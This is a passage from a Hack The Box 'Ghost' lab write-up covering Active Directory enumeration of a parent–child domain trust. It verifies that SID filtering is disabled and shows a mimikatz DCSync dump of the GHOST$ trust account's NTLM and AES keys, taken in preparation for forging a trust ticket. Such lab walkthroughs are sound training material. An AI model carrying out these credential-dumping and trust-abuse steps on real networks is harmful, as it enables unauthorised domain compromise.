corp.ghost.htb
Upon compromising the PRIMARY host, I was still confused as I couldn’t figure out the relation and how the PRIMARY host fits into the target organization.
As far as both ldapdomaindump and bloodhound enumerations, there is no such host as PRIMARY in the GHOST.HTB domain
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ echo -e '[realms]\n\n\tGHOST.HTB = {\n\t\tkdc = dc01.ghost.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
GHOST.HTB = {
kdc = dc01.ghost.htb
}
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get dnsDump --no-detail
recordName: dc01.ghost.htb
A: 10.10.11.24; 10.0.0.254
recordName: 474f28d4-2ee2-4265-91ed-1a724db27810._msdcs.ghost.htb
CNAME: primary.corp.ghost.htb
recordName: 513ce2e2-b58a-4774-8262-db6ba61d5b8a._msdcs.ghost.htb
CNAME: dc01.ghost.htb
recordName: core.ghost.htb
type: ACCESS DENIED
recordName: intranet.ghost.htb
type: ACCESS DENIED
recordName: gitea.ghost.htb
type: ACCESS DENIED
recordName: PRIMARY.corp.ghost.htb
type: ACCESS DENIED
recordName: corp.ghost.htb
type: ACCESS DENIED
recordName: federation.ghost.htb
type: ACCESS DENIED
recordName: core.ghost.htb
type: ACCESS DENIED
recordName: intranet.ghost.htb
type: ACCESS DENIED
recordName: gitea.ghost.htb
type: ACCESS DENIED
recordName: PRIMARY.corp.ghost.htb
type: ACCESS DENIED
recordName: corp.ghost.htb
type: ACCESS DENIED
recordName: federation.ghost.htb
type: ACCESS DENIEDInvestigating further into the DNS records, PRIMARY.corp.ghost.htb, suggests that the PRIMARY host belongs to the CORP.GHOST.HTB domain, which is TRUSTED by GHOST.HTB domain
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get children DC=GHOST,DC=HTB | grep -i corp.ghost.htb
distinguishedName: CN=corp.ghost.htb,CN=System,DC=ghost,DC=htbInterestingly, corp.ghost.htb is under CN=System,DC=ghost,DC=htb
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=florence.ramirez@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get object CN=corp.ghost.htb,CN=System,DC=ghost,DC=htb --resolve-sd
distinguishedName: CN=corp.ghost.htb,CN=System,DC=ghost,DC=htb
cn: corp.ghost.htb
dSCorePropagationData: 1601-01-01 00:00:00+00:00
flatName: GHOST-CORP
instanceType: 4
isCriticalSystemObject: True
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: Domain Admins
nTSecurityDescriptor.ACL.0.Right: WRITE_PROP
nTSecurityDescriptor.ACL.0.ObjectType: 736e4812-af31-11d2-b7df-00805f48caeb
nTSecurityDescriptor.ACL.0.InheritedObjectType: Trusted-Domain
nTSecurityDescriptor.ACL.1.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.1.Trustee: Domain Admins
nTSecurityDescriptor.ACL.1.Right: DELETE
nTSecurityDescriptor.ACL.1.ObjectType: Self
nTSecurityDescriptor.ACL.2.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.2.Trustee: Domain Admins; LOCAL_SYSTEM
nTSecurityDescriptor.ACL.2.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.2.ObjectType: Self
nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.3.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.3.Right: GENERIC_READ
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.4.Right: READ_PROP
nTSecurityDescriptor.ACL.4.ObjectType: General-Information; Logon-Information; Group-Membership; Remote-Access-Information; Account-Restrictions
nTSecurityDescriptor.ACL.4.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.4.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.5.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: CREATOR_OWNER; PRINCIPAL_SELF
nTSecurityDescriptor.ACL.6.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.6.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.6.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.7.Right: READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.7.InheritedObjectType: Computer; User; Group
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.8.Right: WRITE_PROP
nTSecurityDescriptor.ACL.8.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.8.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.9.Right: GENERIC_READ
nTSecurityDescriptor.ACL.9.ObjectType: Self
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; Group; inetOrgPerson
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.10.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.11.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.11.ObjectType: Private-Information
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.12.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.12.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.12.ObjectType: Self
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: LIST_CHILD
nTSecurityDescriptor.ACL.13.ObjectType: Self
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.14.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.14.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
name: corp.ghost.htb
objectCategory: CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=ghost,DC=htb
objectClass: top; leaf; trustedDomain
objectGUID: {6a8048b9-26d0-4056-acfe-4cbc25545be2}
securityIdentifier: AQQAAAAAAAUVAAAAfWNAeX6j8KLyH7kK
showInAdvancedViewOnly: True
trustAttributes: 32
trustDirection: 3
trustPartner: corp.ghost.htb
trustPosixOffset: -2147483648
trustType: 2
uSNChanged: 49194
uSNCreated: 16495
whenChanged: 2024-06-18 15:55:05+00:00
whenCreated: 2024-02-01 02:33:33+00:00CORP.GHOST.HTB appears to be a child domain of GHOST.HTB
The trustDirection attribute is set to 3, which refers to the bidirectional trust according to the official Microsoft documentation
The trustType attribute is set to 2; UPLEVEL
PS C:\> whoami
nt authority\system
PS C:\> hostname
PRIMARY
PS C:\> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=ghost.htb,CN=System,DC=corp,DC=ghost,DC=htb
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : ghost.htb
ObjectClass : trustedDomain
ObjectGUID : b0c64079-6f51-4516-9a62-90f94666bfc1
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=corp,DC=ghost,DC=htb
Target : ghost.htb
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : FalseIt can be confirmed by checking the domain trust from the PRIMARY host via the Get-ADTrust PowerShell cmdlet
PS C:\tmp> cmd /c netdom.exe trust CORP.GHOST.HTB /domain:GHOST.HTB /quarantine
SID filtering is not enabled for this trust. All SIDs presented in an
authentication request from this domain will be honored.
The command completed successfully.SID filtering is NOT enabled for the trust If a user is migrated from one forest to another and SID Filtering is not enabled, it becomes possible to add a SID from the other forest, and this SID will be added to the user’s token when authenticating across the trust.
This would also mean that I can abuse the trust relationship (parent-child) between CORP.GHOST.HTB and GHOST.HTB by forging a special golden trust ticket
But that requires a trust account
GHOST$
PS C:\tmp> Get-ADUser -Identity GHOST$ -Properties *
AccountExpirationDate :
accountExpires : 9223372036854775807
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 0
badPasswordTime : 0
badPwdCount : 0
CannotChangePassword : False
CanonicalName : corp.ghost.htb/Users/GHOST$
Certificates : {}
City :
CN : GHOST$
codePage : 0
Company :
CompoundIdentitySupported : {}
Country :
countryCode : 0
Created : 1/31/2024 10:38:33 AM
createTimeStamp : 1/31/2024 10:38:33 AM
Deleted :
Department :
Description :
DisplayName :
DistinguishedName : CN=GHOST$,CN=Users,DC=corp,DC=ghost,DC=htb
Division :
DoesNotRequirePreAuth : False
dSCorePropagationData : {12/31/1600 4:00:00 PM}
EmailAddress :
EmployeeID :
EmployeeNumber :
Enabled : True
Fax :
GivenName :
HomeDirectory :
HomedirRequired : False
HomeDrive :
HomePage :
HomePhone :
Initials :
instanceType : 4
isCriticalSystemObject : True
isDeleted :
KerberosEncryptionType : {}
LastBadPasswordAttempt :
LastKnownParent :
lastLogoff : 0
lastLogon : 0
LastLogonDate :
LockedOut : False
logonCount : 0
LogonWorkstations :
Manager :
MemberOf : {}
MNSLogonAccount : False
MobilePhone :
Modified : 6/18/2024 8:55:06 AM
modifyTimeStamp : 6/18/2024 8:55:06 AM
msDS-User-Account-Control-Computed : 0
Name : GHOST$
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Person,CN=Schema,CN=Configuration,DC=ghost,DC=htb
ObjectClass : user
ObjectGUID : 6a5c624b-27e1-4e81-8e84-e0c7fc05657f
objectSid : S-1-5-21-2034262909-2733679486-179904498-1103
Office :
OfficePhone :
Organization :
OtherName :
PasswordExpired : False
PasswordLastSet : 6/18/2024 8:55:06 AM
PasswordNeverExpires : False
PasswordNotRequired : True
POBox :
PostalCode :
PrimaryGroup : CN=Domain Users,CN=Users,DC=corp,DC=ghost,DC=htb
primaryGroupID : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath :
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133631997063280882
SamAccountName : GHOST$
sAMAccountType : 805306370
ScriptPath :
sDRightsEffective : 15
ServicePrincipalNames : {}
SID : S-1-5-21-2034262909-2733679486-179904498-1103
SIDHistory : {}
SmartcardLogonRequired : False
State :
StreetAddress :
Surname :
Title :
TrustedForDelegation : False
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 2080
userCertificate : {}
UserPrincipalName :
uSNChanged : 20517
uSNCreated : 12890
whenChanged : 6/18/2024 8:55:06 AM
whenCreated : 1/31/2024 10:38:33 AMThe GHOST$ account is a user account despite of that trailing $ sign. That’s what makes the account special. This is because the GHOST$ account is a trust account across the domain forest
INTERDOMAIN_TRUST_ACCOUNT
The answer lies in the userAccountControl attribute with its value set to 2080
According to the official Microsoft documentation,
0x0800 (2048 in decimal): This flag indicates that the account is an INTERDOMAIN_TRUST_ACCOUNT.
hashdump
mimikatz # lsadump::dcsync /user:GHOST$
[DC] 'corp.ghost.htb' will be the domain
[DC] 'PRIMARY.corp.ghost.htb' will be the DC server
[DC] 'GHOST$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : GHOST$
** SAM ACCOUNT **
SAM Username : GHOST$
Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 6/18/2024 8:55:06 AM
Object Security ID : S-1-5-21-2034262909-2733679486-179904498-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: dae1ad83e2af14a379017f244a2f5297
ntlm- 0: dae1ad83e2af14a379017f244a2f5297
ntlm- 1: 2636885e5b7ee03e66fac8a567a14cb8
ntlm- 2: 2636885e5b7ee03e66fac8a567a14cb8
lm - 0: c8a823036bf239d95c1d166305f8e79a
lm - 1: dd2679126cbff3074d6ac55b46bcff8e
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : CORP.GHOST.HTBkrbtgtGHOST
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b
aes128_hmac (4096) : da9ac6706a5f1b240782fc36ed028917
des_cbc_md5 (4096) : 620d527c97fba726
OldCredentials
aes256_hmac (4096) : d2ab719f9ad073f12da25e8e2799486be50f8c19e725f40e76d04f8fa428c5c5
aes128_hmac (4096) : c225eaa67fceec20f2457ac5649fc9d2
des_cbc_md5 (4096) : 83dae62551a26ea1
OlderCredentials
aes256_hmac (4096) : d2ab719f9ad073f12da25e8e2799486be50f8c19e725f40e76d04f8fa428c5c5
aes128_hmac (4096) : c225eaa67fceec20f2457ac5649fc9d2
des_cbc_md5 (4096) : 83dae62551a26ea1
* Primary:Kerberos *
Default Salt : CORP.GHOST.HTBkrbtgtGHOST
Credentials
des_cbc_md5 : 620d527c97fba726
OldCredentials
des_cbc_md5 : 83dae62551a26ea1
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a690b95aa54d9f0b8949f8ebc989fa22
02 bc481affbee64de7871fc26e840c8d3f
03 a690b95aa54d9f0b8949f8ebc989fa22
04 a690b95aa54d9f0b8949f8ebc989fa22
05 357d82c56fcba97537a80b6b1646a303
06 357d82c56fcba97537a80b6b1646a303
07 b81618223d10540b14a79cef6077524c
08 c083ba2f1fdc6babde6ecd22e59e00d3
09 7726dea11b36e67b7010272f04387b02
10 652f3cca8209ce595b1d0acfe72d33f5
11 652f3cca8209ce595b1d0acfe72d33f5
12 c083ba2f1fdc6babde6ecd22e59e00d3
13 c083ba2f1fdc6babde6ecd22e59e00d3
14 a1d295f5ce6081b8a4426fa3b465f3b4
15 6ea9bcc718cc977cf096cdf1ce398d17
16 7ea9477ed24b4aeefe912e138f774a1d
17 162db51d0b81a2b3e2b1186cfa57e78e
18 6e1327fbed9281d78b3880b8e782e31c
19 1ce7901a529ea401146cdde02480ef23
20 6e1327fbed9281d78b3880b8e782e31c
21 7c67fb9ecb18de05a4d42c9855778aef
22 7617a933b0792a05b747e913fe368af4
23 7c67fb9ecb18de05a4d42c9855778aef
24 c1da681b912f7491da8a75d1578fbd3c
25 0e81343b14c663f3985a71d9473ed97e
26 cfa0f06f77c9635a15f90aeae48d2d89
27 4449558fad37c76d617ff42d068fe9dd
28 5aba2cebe9e42845d1aa88089a5afe21
29 4449558fad37c76d617ff42d068fe9ddIt is indeed a Trust Account with the INTERDOMAIN_TRUST_ACCOUNT attribute set
- NTLM:
dae1ad83e2af14a379017f244a2f5297 - aes256_hmac:
3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b - aes128_hmac:
da9ac6706a5f1b240782fc36ed028917